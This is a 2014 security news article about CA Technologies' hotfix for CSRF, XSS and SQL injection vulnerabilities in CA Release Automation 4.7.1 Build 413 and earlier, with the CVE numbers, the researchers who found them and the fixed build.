CA Release Automation gets Hotfix

Wednesday, December 17, 2014 @ 04:12 PM gHale


One of the biggest independent software companies, CA Technologies, issued a hotfix to mitigate several vulnerabilities affecting CA Release Automation.

CA Release Automation, formerly known as CA LISA Release Automation, is an enterprise-class, continuous delivery solution that automates complex, multi-tier release deployments. The software helps speed up application release cycles, achieve higher quality releases, and reduce application deployment costs.

RELATED STORIES
Malware Targets Manufacturers
Mobile Spy Program Target: Oil Industry
Surveillance Malware Hides as Legit Software
Details Emerge on Espionage Campaign

According to an advisory published on Monday by CA Technologies and the CERT Coordination Center (CERT/CC) at Carnegie Mellon University, the vulnerabilities affect CA Release Automation 4.7.1 Build 413 and earlier running on Windows, Linux and Solaris. CA addressed the issues in CA Release Automation 4.7.1 Build 448.

The first vulnerability, a cross-site request forgery (CSRF), ended up reported jointly by Lukasz Plonka and Julian Horoszkiewicz. An attacker can exploit the flaw (CVE-2014-8246) to perform actions on an affected system with the permissions of the targeted user. For the attack to work, the malicious actor must end up authenticated and he must have an active session.

Another security hole reported by Horoszkiewicz is a cross-site scripting issue (XSS). The bug (CVE-2014-8247) is in the server exception message, CERT/CC said.

The third vulnerability, identified and reported by Plonka, is an SQL injection (CVE-2014-8248) that an attacker can exploit via a non-privileged account to access sensitive information through a specially crafted query.

CA Technologies advises customers to check if their installation suffers from the issue by accessing the “About Automation Studio” page in Release Automation. If the version is older than 4.7.1.448, they should apply the hotfix.



Leave a Reply

You must be logged in to post a comment.